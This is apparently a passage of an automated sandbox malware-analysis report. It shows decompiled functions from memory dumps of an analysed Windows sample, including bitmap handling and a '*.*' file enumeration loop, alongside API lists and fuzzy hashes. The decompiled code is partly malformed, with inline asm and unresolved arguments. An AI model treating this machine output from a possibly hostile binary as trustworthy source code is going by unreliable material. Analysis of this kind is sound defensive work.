				} else {
					_t3 =  *0x409030(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402530(1);
					}
				}
				return _t6;
			}





                                                                                                                          0x0040244b
                                                                                                                          0x00402462
                                                                                                                          0x0040244d
                                                                                                                          0x0040244d
                                                                                                                          0x00402453
                                                                                                                          0x00402457
                                                                                                                          0x0040245b
                                                                                                                          0x0040245b
                                                                                                                          0x00402457
                                                                                                                          0x00402467

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                                                                          • Instruction ID: d53205a698bee5913c9905fe3b2fa7a5b2040cee35667c8cc0b5dc0e3ef69e66
                                                                                                                          • Opcode Fuzzy Hash: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                                                                          • Instruction Fuzzy Hash: 6AC08C6030270387DB202AFA1FDC113125C3F24205300403BA901F13D3EAF8CD089A2F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406510, Relevance: .0, Instructions: 7COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406510(void* __eax, void* __edx) {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				intOrPtr* _t10;

				_t3 = E00406B48(_t10, _t4, __edx, 0, _t8, _t9); // executed
				return _t3;
			}








                                                                                                                          0x00406517
                                                                                                                          0x0040651d

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: IconInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2096194817-0
                                                                                                                          • Opcode ID: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                                                                          • Instruction ID: 2c83cf8f1268621ffc1ea80895ab672af1bae2362a1aae74aa6b220125402c61
                                                                                                                          • Opcode Fuzzy Hash: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                                                                          • Instruction Fuzzy Hash: 92A002C6751214079B4CE53F1C6292A729F07C8615759C87A7906DA289CD38E8512155
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 0040F0C4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 3541575487-438819550
                                                                                                                          • Opcode ID: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                                                                          • Instruction ID: 21f552544a71644aa5a29d04448db43bc273ae507e021618840bae1d7485b843
                                                                                                                          • Opcode Fuzzy Hash: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                                                                          • Instruction Fuzzy Hash: C431B071704100ABDB15AB66D88286B37A9DF86328720457FF804EF6C7DA7CDC1A8699
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040F0CC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 3541575487-438819550
                                                                                                                          • Opcode ID: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                                                                          • Instruction ID: 271996e333eb2d0f8e3e23676571f4307960fb9fe6b8e39aca4bbd563d4a420a
                                                                                                                          • Opcode Fuzzy Hash: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                                                                          • Instruction Fuzzy Hash: 1031C171700100ABDB14EF67D88286B369ADF85328720457FF804EF6C7EA7CDC0A8699
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040627C, Relevance: 25.7, APIs: 17, Instructions: 183COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 46%
                                                                                                                          			E0040627C(void* __eax, void* __ebp, void* __eflags) {
				struct HDC__* _v8;
				intOrPtr _v12;
				intOrPtr _v36;
				intOrPtr _v40;
				struct HDC__* _v44;
				struct HDC__* _v60;
				struct HDC__* _v68;
				struct HDC__* _v72;
				void* _t59;
				struct HBITMAP__* _t62;
				void* _t68;
				void* _t71;
				int _t72;
				int _t75;
				int _t80;
				void* _t81;
				void* _t85;
				void* _t94;
				void* _t100;
				void* _t114;
				struct HDC__* _t116;
				struct HDC__* _t119;
				signed int _t121;
				struct HBITMAP__* _t124;
				struct HBITMAP__* _t125;
				RECT* _t126;
				void* _t128;

				_t128 = __eflags;
				_push(__eax);
				E00406144(__eax);
				_pop(_t59);
				if(_t128 != 0) {
					asm("pushad");
					_t100 = _t59;
					 *((intOrPtr*)(_t100 + 0x34))();
					 *((intOrPtr*)(_t100 + 0x28)) = 0;
					 *((intOrPtr*)(_t100 + 0x56)) = 0;
					 *((intOrPtr*)(_t100 + 0x5a)) = 0;
					asm("jecxz 0x13");
					_t62 =  *(_t100 + 0x3d);
					_t121 =  *(_t62 + 4);
					_t119 =  *(_t62 + 8);
					if(_t119 < 0) {
						_t119 =  ~_t119;
					}
					_push(0);
					L00404108();
					_push(_t62);
					_t130 =  *((char*)(_t100 + 0x3c)) - 1;
					if( *((char*)(_t100 + 0x3c)) != 1) {
						asm("jecxz 0xfffffff2");
						_t124 = 0;
						_t110 =  *(_t100 + 0x18);
						_push(E00405F70( *((intOrPtr*)(_t100 + 0x1c)),  *((intOrPtr*)(( *(_t100 + 0x49) & 0x000000ff) + 0x409188)),  *(_t100 + 0x18)));
						__eflags =  *(_t100 + 0x49) - 5;
						if( *(_t100 + 0x49) == 5) {
							E0040600C(_t67, _t110);
						}
						_pop(_t68);
						_push(_t68);
						_push(E00406268(_t68) *  *(_t100 + 0x18));
						_t71 = E00402448(E00406268(_t68) *  *(_t100 + 0x18));
						_push(_t71);
						_push(0);
						_push(_v12);
						_push(_t71);
						_t72 =  *(_t100 + 0x18);
						__eflags = _t72 - _t119;
						if(__eflags > 0) {
							_t72 = _t119;
						}
						_t75 = GetDIBits(_v8, E00406154(_t100, __eflags), 0, _t72, ??, ??, ??);
						_t113 =  *(_t100 + 0x18);
						__eflags = _t113 - _t119;
						if(_t113 > _t119) {
							_t113 = _t119;
						}
						__eflags = _t75 - _t113;
						if(__eflags != 0) {
							_pop(_t81);
							E00402468(_t81);
							_push(0);
							_push(0);
							_push(0);
							_push(_t126);
							_push(0);
							_push(_v40);
							_push(_v36);
							L00404110();
							_t121 = _t121 ^ 0xffffffff;
							_t124 = 0;
							_t85 = SelectObject(_v60, 0);
							_t113 = _v68;
							__eflags = 0;
							E00406094(_t100, 0, _v68, 0, 0);
							SelectObject(_v72, _t85);
						}
						E00406024(_t100, _t100, _t113, __eflags);
						_pop( *_t47);
						_pop( *_t48);
						_pop( *_t49);
						 *(_t100 + 0x20) = _t124;
						__eflags = _t121;
						 *(_t100 + 0x72) = 0;
						if(_t121 < 0) {
							_t52 = _t100 + 0x72;
							 *_t52 =  *(_t100 + 0x72) + 1;
							__eflags =  *_t52;
						}
					} else {
						_push(0);
						L00404178();
						_push(_t62);
						_push( *(_t100 + 0x18));
						_push( *((intOrPtr*)(_t100 + 0x1c)));
						_push(_t62);
						L00404100();
						_t125 = _t62;
						L00404190();
						_t116 = 0;
						_push(_t116);
						_push(SelectObject(_t116, _t125));
						_push( *(_t100 + 0x18));
						_push( *((intOrPtr*)(_t100 + 0x1c)));
						_push(0);
						_t94 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t100 + 0x2c))));
						_t117 = _t126;
						FillRect(_v44, _t126, _t94);
						DeleteObject(_t94);
						asm("jecxz 0x24");
						SelectObject(_v60, 0);
						SetDIBits(_v68, _t125, 0,  *(_t100 + 0x18),  *(_t100 + 0x41),  *(_t100 + 0x3d), 0);
						E00406024(_t100, _t100, _t117, _t130);
						 *(_t100 + 0x20) = _t125;
					}
					asm("jecxz 0xa");
					_pop(_t114);
					 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x4a))))(_t114);
					_t80 = DeleteDC(_t119);
					asm("popad");
					return _t80;
				}
				return _t59;
			}






























                                                                                                                          0x0040627c
                                                                                                                          0x0040627c
                                                                                                                          0x0040627d
                                                                                                                          0x00406282
                                                                                                                          0x00406283
                                                                                                                          0x00406289
                                                                                                                          0x0040628a
                                                                                                                          0x0040628c
                                                                                                                          0x00406291
                                                                                                                          0x00406294
                                                                                                                          0x00406297
                                                                                                                          0x004062a3
                                                                                                                          0x004062a5
                                                                                                                          0x004062a8
                                                                                                                          0x004062ab
                                                                                                                          0x004062b0
                                                                                                                          0x004062b2
                                                                                                                          0x004062b2
                                                                                                                          0x004062d5
                                                                                                                          0x004062d7
                                                                                                                          0x004062dc
                                                                                                                          0x004062dd
                                                                                                                          0x004062e1
                                                                                                                          0x00406397
                                                                                                                          0x00406399
                                                                                                                          0x0040639e
                                                                                                                          0x004063a6
                                                                                                                          0x004063a7
                                                                                                                          0x004063ab
                                                                                                                          0x004063ad
                                                                                                                          0x004063ad
                                                                                                                          0x004063b2
                                                                                                                          0x004063b3
                                                                                                                          0x004063be
                                                                                                                          0x004063bf
                                                                                                                          0x004063c4
                                                                                                                          0x004063c5
                                                                                                                          0x004063c7
                                                                                                                          0x004063cb
                                                                                                                          0x004063cc
                                                                                                                          0x004063cf
                                                                                                                          0x004063d1
                                                                                                                          0x004063d3
                                                                                                                          0x004063d3
                                                                                                                          0x004063e4
                                                                                                                          0x004063e9
                                                                                                                          0x004063ec
                                                                                                                          0x004063ee
                                                                                                                          0x004063f0
                                                                                                                          0x004063f0
                                                                                                                          0x004063f2
                                                                                                                          0x004063f4
                                                                                                                          0x004063f6
                                                                                                                          0x004063f7
                                                                                                                          0x004063fe
                                                                                                                          0x00406405
                                                                                                                          0x00406406
                                                                                                                          0x00406407
                                                                                                                          0x00406408
                                                                                                                          0x0040640a
                                                                                                                          0x0040640b
                                                                                                                          0x0040640f
                                                                                                                          0x00406414
                                                                                                                          0x00406417
                                                                                                                          0x0040641d
                                                                                                                          0x00406423
                                                                                                                          0x00406427
                                                                                                                          0x0040642c
                                                                                                                          0x00406435
                                                                                                                          0x00406435
                                                                                                                          0x0040643c
                                                                                                                          0x00406441
                                                                                                                          0x00406444
                                                                                                                          0x00406447
                                                                                                                          0x0040644a
                                                                                                                          0x0040644d
                                                                                                                          0x0040644f
                                                                                                                          0x00406453
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x004062e7
                                                                                                                          0x004062e7
                                                                                                                          0x004062e9
                                                                                                                          0x004062ee
                                                                                                                          0x004062ef
                                                                                                                          0x004062f2
                                                                                                                          0x004062f5
                                                                                                                          0x004062f6
                                                                                                                          0x004062fb
                                                                                                                          0x004062fe
                                                                                                                          0x00406303
                                                                                                                          0x00406304
                                                                                                                          0x0040630c
                                                                                                                          0x0040630d
                                                                                                                          0x00406310
                                                                                                                          0x00406313
                                                                                                                          0x00406320
                                                                                                                          0x00406325
                                                                                                                          0x0040632e
                                                                                                                          0x00406333
                                                                                                                          0x0040633e
                                                                                                                          0x00406344
                                                                                                                          0x0040635b
                                                                                                                          0x00406378
                                                                                                                          0x0040637d
                                                                                                                          0x0040637d
                                                                                                                          0x0040645b
                                                                                                                          0x0040645d
                                                                                                                          0x00406463
                                                                                                                          0x00406465
                                                                                                                          0x0040646a
                                                                                                                          0x00000000
                                                                                                                          0x0040646a
                                                                                                                          0x0040646b

                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018), ref: 004062C2
                                                                                                                          • 73BBA590.GDI32(00000000,?,00000000,?,00000000), ref: 004062D7
                                                                                                                          • 73BBAC50.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?), ref: 004062E9
                                                                                                                          • 73BBA520.GDI32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062F6
                                                                                                                          • 73BBB380.USER32(00000000,00000000,?,?,00000000,00000000), ref: 004062FE
                                                                                                                          • SelectObject.GDI32(00000000), ref: 00406307
                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00406320
                                                                                                                          • FillRect.USER32 ref: 0040632E
                                                                                                                          • DeleteObject.GDI32(?), ref: 00406333
                                                                                                                          • SelectObject.GDI32(?), ref: 00406344
                                                                                                                          • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040635B
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00406371
                                                                                                                          • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 004063E4
                                                                                                                          • 73BBA7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 0040640F
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0040641D
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00406435
                                                                                                                          • DeleteDC.GDI32 ref: 00406465
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2504469172-0
                                                                                                                          • Opcode ID: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                                                                                          • Instruction ID: a9e686f7fc2ed882930d99cc47d1dbb646c45f2a2f24960de351e96cc7451368
                                                                                                                          • Opcode Fuzzy Hash: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                                                                                          • Instruction Fuzzy Hash: AE5195B1204200AFDB05AF65CC86F2B3AA9EF94314F1145BEBA45BF1D7C639DC618798
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040FD14, Relevance: 25.7, APIs: 17, Instructions: 183COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018), ref: 0040FD5A
                                                                                                                          • 73BBA590.GDI32(00000000), ref: 0040FD6F
                                                                                                                          • 73BBAC50.USER32(00000000,00000000,00000000), ref: 0040FD81
                                                                                                                          • 73BBA520.GDI32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD8E
                                                                                                                          • 73BBB380.USER32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD96
                                                                                                                          • SelectObject.GDI32(00000000), ref: 0040FD9F
                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 0040FDB8
                                                                                                                          • FillRect.USER32 ref: 0040FDC6
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040FDCB
                                                                                                                          • SelectObject.GDI32(?), ref: 0040FDDC
                                                                                                                          • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040FDF3
                                                                                                                          • SelectObject.GDI32(?), ref: 0040FE09
                                                                                                                          • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 0040FE7C
                                                                                                                          • 73BBA7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040FEA7
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0040FEB5
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0040FECD
                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0040FEFD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2504469172-0
                                                                                                                          • Opcode ID: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                                                                                          • Instruction ID: 8bfa987d25260d88ee3329e71298cc77801f48d1f8f03ee880f1b7424a85638e
                                                                                                                          • Opcode Fuzzy Hash: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                                                                                          • Instruction Fuzzy Hash: A051D4716042006FDB14AF65CC82F2B3B69EF84314F1148BEB905BB6D7D639EC088B98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406218, Relevance: 16.6, APIs: 11, Instructions: 119COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 57%
                                                                                                                          			E00406218(void* __eax, void* __ecx, void* __edx, void* __ebp, void* __eflags) {
				struct HDC__* _v8;
				intOrPtr _v12;
				intOrPtr _v36;
				intOrPtr _v40;
				struct HDC__* _v44;
				struct HDC__* _v60;
				struct HDC__* _v68;
				struct HDC__* _v72;
				void* __ebx;
				void* _t64;
				void* _t66;
				struct HBITMAP__* _t69;
				void* _t75;
				void* _t78;
				int _t79;
				int _t82;
				int _t87;
				void* _t88;
				void* _t92;
				void* _t101;
				void* _t108;
				void* _t111;
				void* _t113;
				void* _t115;
				void* _t133;
				struct HDC__* _t135;
				struct HDC__* _t137;
				void* _t139;
				int* _t140;
				struct HDC__* _t142;
				signed int _t144;
				struct HBITMAP__* _t147;
				struct HBITMAP__* _t148;
				RECT* _t149;
				void* _t151;

				_t151 = __eflags;
				_t113 = __eax;
				_t64 = E00406144(__eax);
				if(_t151 == 0) {
					L7:
					if(__eflags != 0) {
						E00406144(_t64);
						_t66 = _t64;
						if(__eflags != 0) {
							asm("pushad");
							_t115 = _t66;
							 *((intOrPtr*)(_t115 + 0x34))();
							 *((intOrPtr*)(_t115 + 0x28)) = 0;
							 *((intOrPtr*)(_t115 + 0x56)) = 0;
							 *((intOrPtr*)(_t115 + 0x5a)) = 0;
							asm("jecxz 0x13");
							_t69 =  *(_t115 + 0x3d);
							_t144 =  *(_t69 + 4);
							_t142 =  *(_t69 + 8);
							__eflags = _t142;
							if(_t142 < 0) {
								_t142 =  ~_t142;
							}
							_push(0);
							L00404108();
							_push(_t69);
							__eflags =  *((char*)(_t115 + 0x3c)) - 1;
							if( *((char*)(_t115 + 0x3c)) != 1) {
								asm("jecxz 0xfffffff2");
								_t147 = 0;
								_t129 =  *(_t115 + 0x18);
								_push(E00405F70( *((intOrPtr*)(_t115 + 0x1c)),  *((intOrPtr*)(( *(_t115 + 0x49) & 0x000000ff) + 0x409188)),  *(_t115 + 0x18)));
								__eflags =  *(_t115 + 0x49) - 5;
								if( *(_t115 + 0x49) == 5) {
									E0040600C(_t74, _t129);
								}
								_pop(_t75);
								_push(_t75);
								_push(E00406268(_t75) *  *(_t115 + 0x18));
								_t78 = E00402448(E00406268(_t75) *  *(_t115 + 0x18));
								_push(_t78);
								_push(0);
								_push(_v12);
								_push(_t78);
								_t79 =  *(_t115 + 0x18);
								__eflags = _t79 - _t142;
								if(__eflags > 0) {
									_t79 = _t142;
								}
								_t82 = GetDIBits(_v8, E00406154(_t115, __eflags), 0, _t79, ??, ??, ??);
								_t132 =  *(_t115 + 0x18);
								__eflags = _t132 - _t142;
								if(_t132 > _t142) {
									_t132 = _t142;
								}
								__eflags = _t82 - _t132;
								if(__eflags != 0) {
									_pop(_t88);
									E00402468(_t88);
									_push(0);
									_push(0);
									_push(0);
									_push(_t149);
									_push(0);
									_push(_v40);
									_push(_v36);
									L00404110();
									_t144 = _t144 ^ 0xffffffff;
									_t147 = 0;
									_t92 = SelectObject(_v60, 0);
									_t132 = _v68;
									__eflags = 0;
									E00406094(_t115, 0, _v68, 0, 0);
									SelectObject(_v72, _t92);
								}
								E00406024(_t115, _t115, _t132, __eflags);
								_pop( *_t51);
								_pop( *_t52);
								_pop( *_t53);
								 *(_t115 + 0x20) = _t147;
								__eflags = _t144;
								 *(_t115 + 0x72) = 0;
								if(_t144 < 0) {
									_t56 = _t115 + 0x72;
									 *_t56 =  &( *(_t115 + 0x72)->i);
									__eflags =  *_t56;
								}
								goto L25;
							} else {
								_push(0);
								L00404178();
								_push(_t69);
								_push( *(_t115 + 0x18));
								_push( *((intOrPtr*)(_t115 + 0x1c)));
								_push(_t69);
								L00404100();
								_t148 = _t69;
								L00404190();
								_t135 = 0;
								_push(_t135);
								_push(SelectObject(_t135, _t148));
								_push( *(_t115 + 0x18));
								_push( *((intOrPtr*)(_t115 + 0x1c)));
								_push(0);
								_t101 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t115 + 0x2c))));
								_t136 = _t149;
								FillRect(_v44, _t149, _t101);
								DeleteObject(_t101);
								asm("jecxz 0x24");
								SelectObject(_v60, 0);
								SetDIBits(_v68, _t148, 0,  *(_t115 + 0x18),  *(_t115 + 0x41),  *(_t115 + 0x3d), 0);
								E00406024(_t115, _t115, _t136, __eflags);
								 *(_t115 + 0x20) = _t148;
								L25:
								asm("jecxz 0xa");
								_pop(_t133);
								 *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x4a))))(_t133);
								_t87 = DeleteDC(_t142);
								asm("popad");
								return _t87;
							}
						}
						return _t66;
					} else {
						return _t64;
					}
				} else {
					_push(__edx);
					_t64 = E0040648C(_t113, __edx);
					_pop(_t137);
					if(_t64 == _t137) {
						goto L7;
					} else {
						_t108 = _t113;
						if(_t137 != 0) {
							 *(_t113 + 0x49) = _t137;
							__eflags = _t137 - 5;
							if(_t137 == 5) {
								_t137 = _t137 - 1;
								__eflags = _t137;
							}
							L27();
							_t111 = E00405F98( *( *((intOrPtr*)(_t113 + 0x3d)) + 0xe) & 0x0000ffff, 0);
							_t139 = _t137;
							__eflags = _t111 - _t139;
							_t64 = _t113;
							goto L7;
						} else {
							_t140 =  &(_t137->i);
							if(_t140 !=  *(_t108 + 0x3c)) {
								 *(_t108 + 0x3c) = _t140;
								L9();
								return _t108;
							}
							return _t108;
						}
					}
				}
			}






































                                                                                                                          0x00406218
                                                                                                                          0x00406219
                                                                                                                          0x0040621b
                                                                                                                          0x00406220
                                                                                                                          0x0040625d
                                                                                                                          0x0040625e
                                                                                                                          0x0040627d
                                                                                                                          0x00406282
                                                                                                                          0x00406283
                                                                                                                          0x00406289
                                                                                                                          0x0040628a
                                                                                                                          0x0040628c
                                                                                                                          0x00406291
                                                                                                                          0x00406294
                                                                                                                          0x00406297
                                                                                                                          0x004062a3
                                                                                                                          0x004062a5
                                                                                                                          0x004062a8
                                                                                                                          0x004062ab
                                                                                                                          0x004062ae
                                                                                                                          0x004062b0
                                                                                                                          0x004062b2
                                                                                                                          0x004062b2
                                                                                                                          0x004062d5
                                                                                                                          0x004062d7
                                                                                                                          0x004062dc
                                                                                                                          0x004062dd
                                                                                                                          0x004062e1
                                                                                                                          0x00406397
                                                                                                                          0x00406399
                                                                                                                          0x0040639e
                                                                                                                          0x004063a6
                                                                                                                          0x004063a7
                                                                                                                          0x004063ab
                                                                                                                          0x004063ad
                                                                                                                          0x004063ad
                                                                                                                          0x004063b2
                                                                                                                          0x004063b3
                                                                                                                          0x004063be
                                                                                                                          0x004063bf
                                                                                                                          0x004063c4
                                                                                                                          0x004063c5
                                                                                                                          0x004063c7
                                                                                                                          0x004063cb
                                                                                                                          0x004063cc
                                                                                                                          0x004063cf
                                                                                                                          0x004063d1
                                                                                                                          0x004063d3
                                                                                                                          0x004063d3
                                                                                                                          0x004063e4
                                                                                                                          0x004063e9
                                                                                                                          0x004063ec
                                                                                                                          0x004063ee
                                                                                                                          0x004063f0
                                                                                                                          0x004063f0
                                                                                                                          0x004063f2
                                                                                                                          0x004063f4
                                                                                                                          0x004063f6
                                                                                                                          0x004063f7
                                                                                                                          0x004063fe
                                                                                                                          0x00406405
                                                                                                                          0x00406406
                                                                                                                          0x00406407
                                                                                                                          0x00406408
                                                                                                                          0x0040640a
                                                                                                                          0x0040640b
                                                                                                                          0x0040640f
                                                                                                                          0x00406414
                                                                                                                          0x00406417
                                                                                                                          0x0040641d
                                                                                                                          0x00406423
                                                                                                                          0x00406427
                                                                                                                          0x0040642c
                                                                                                                          0x00406435
                                                                                                                          0x00406435
                                                                                                                          0x0040643c
                                                                                                                          0x00406441
                                                                                                                          0x00406444
                                                                                                                          0x00406447
                                                                                                                          0x0040644a
                                                                                                                          0x0040644d
                                                                                                                          0x0040644f
                                                                                                                          0x00406453
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x00406455
                                                                                                                          0x00000000
                                                                                                                          0x004062e7
                                                                                                                          0x004062e7
                                                                                                                          0x004062e9
                                                                                                                          0x004062ee
                                                                                                                          0x004062ef
                                                                                                                          0x004062f2
                                                                                                                          0x004062f5
                                                                                                                          0x004062f6
                                                                                                                          0x004062fb
                                                                                                                          0x004062fe
                                                                                                                          0x00406303
                                                                                                                          0x00406304
                                                                                                                          0x0040630c
                                                                                                                          0x0040630d
                                                                                                                          0x00406310
                                                                                                                          0x00406313
                                                                                                                          0x00406320
                                                                                                                          0x00406325
                                                                                                                          0x0040632e
                                                                                                                          0x00406333
                                                                                                                          0x0040633e
                                                                                                                          0x00406344
                                                                                                                          0x0040635b
                                                                                                                          0x00406378
                                                                                                                          0x0040637d
                                                                                                                          0x00406458
                                                                                                                          0x0040645b
                                                                                                                          0x0040645d
                                                                                                                          0x00406463
                                                                                                                          0x00406465
                                                                                                                          0x0040646a
                                                                                                                          0x00000000
                                                                                                                          0x0040646a
                                                                                                                          0x004062e1
                                                                                                                          0x0040646b
                                                                                                                          0x00406264
                                                                                                                          0x00406264
                                                                                                                          0x00406264
                                                                                                                          0x00406222
                                                                                                                          0x00406224
                                                                                                                          0x00406225
                                                                                                                          0x0040622a
                                                                                                                          0x0040622d
                                                                                                                          0x00000000
                                                                                                                          0x0040622f
                                                                                                                          0x00406231
                                                                                                                          0x00406233
                                                                                                                          0x0040623c
                                                                                                                          0x0040623f
                                                                                                                          0x00406242
                                                                                                                          0x00406244
                                                                                                                          0x00406244
                                                                                                                          0x00406244
                                                                                                                          0x00406248
                                                                                                                          0x00406254
                                                                                                                          0x00406259
                                                                                                                          0x0040625a
                                                                                                                          0x0040625c
                                                                                                                          0x00000000
                                                                                                                          0x00406235
                                                                                                                          0x00406236
